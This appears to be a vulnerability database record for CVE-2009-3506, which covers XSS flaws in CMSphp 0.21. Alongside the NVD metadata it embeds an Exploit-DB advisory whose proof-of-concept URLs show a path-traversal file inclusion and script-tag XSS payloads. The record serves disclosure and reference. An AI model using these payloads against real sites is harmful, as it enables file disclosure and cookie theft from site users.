ID CVE-2009-3506
Type cve
Reporter cve@mitre.org
Modified 2017-09-19T01:29:00
Description
Multiple cross-site scripting (XSS) vulnerabilities in CMSphp 0.21 allow remote attackers to inject arbitrary web script or HTML via the (1) cook_user parameter to index.php and the (2) name parameter to modules.php.
{"id": "CVE-2009-3506", "bulletinFamily": "NVD", "title": "CVE-2009-3506", "description": "Multiple cross-site scripting (XSS) vulnerabilities in CMSphp 0.21 allow remote attackers to inject arbitrary web script or HTML via the (1) cook_user parameter to index.php and the (2) name parameter to modules.php.", "published": "2009-10-01T14:30:00", "modified": "2017-09-19T01:29:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3506", "reporter": "cve@mitre.org", "references": ["http://secunia.com/advisories/36075", "http://www.exploit-db.com/exploits/9311"], "cvelist": ["CVE-2009-3506"], "type": "cve", "lastseen": "2021-02-02T05:40:06", "edition": 4, "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:9311"]}], "modified": "2021-02-02T05:40:06", "rev": 2}, "score": {"value": 4.3, "vector": "NONE", "modified": "2021-02-02T05:40:06", "rev": 2}, "vulnersScore": 4.3}, "cpe": ["cpe:/a:jean-michel_wyttenbach:cmsphp:0.21"], "affectedSoftware": [{"cpeName": "jean-michel_wyttenbach:cmsphp", "name": "jean-michel wyttenbach cmsphp", "operator": "eq", "version": "0.21"}], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {}, "cpe23": ["cpe:2.3:a:jean-michel_wyttenbach:cmsphp:0.21:*:*:*:*:*:*:*"], "cwe": ["CWE-79"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:jean-michel_wyttenbach:cmsphp:0.21:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "36075", "refsource": "SECUNIA", "tags": ["Vendor Advisory"], "url": "http://secunia.com/advisories/36075"}, {"name": "9311", "refsource": "EXPLOIT-DB", "tags": [], "url": "http://www.exploit-db.com/exploits/9311"}]}
{"exploitdb": [{"lastseen": "2016-02-01T10:19:21", "description": "CMSphp 0.21 (LFI/XSS) Multiple Remote Vulnerabilities. CVE-2009-3506,CVE-2009-3507. Webapps exploit for php platform", "published": "2009-07-30T00:00:00", "type": "exploitdb", "title": "cmsphp 0.21 - LFI/XSS Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3506", "CVE-2009-3507"], "modified": "2009-07-30T00:00:00", "id": "EDB-ID:9311", "href": "https://www.exploit-db.com/exploits/9311/", "sourceData": "###################################################################################################\n[+] CMSphp 0.21 (LFI/XSS) Multiple Remote Vulnerabilities\n[+] Discovered By SirGod\n[+] http://insecurity-ro.org\n[+] http://h4cky0u.org\n###################################################################################################\n\n[+] Download : http://sourceforge.net/projects/cmsphp/\n\n[+] Local File Inclusion\n\n - PoC\n\n http://127.0.0.1/path/modules.php?name=Your_account&mod_file=../../../../../../boot.ini%00\n\n[+] Cross-Site Scripting\n\n - PoC's\n\n http://127.0.0.1/path/index.php?cook_user=<script>alert(document.cookie)</script>\n\n http://127.0.0.1/path/modules.php?name=<script>alert(document.cookie)</script>\n\n###################################################################################################\n\n# milw0rm.com [2009-07-30]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/9311/"}]}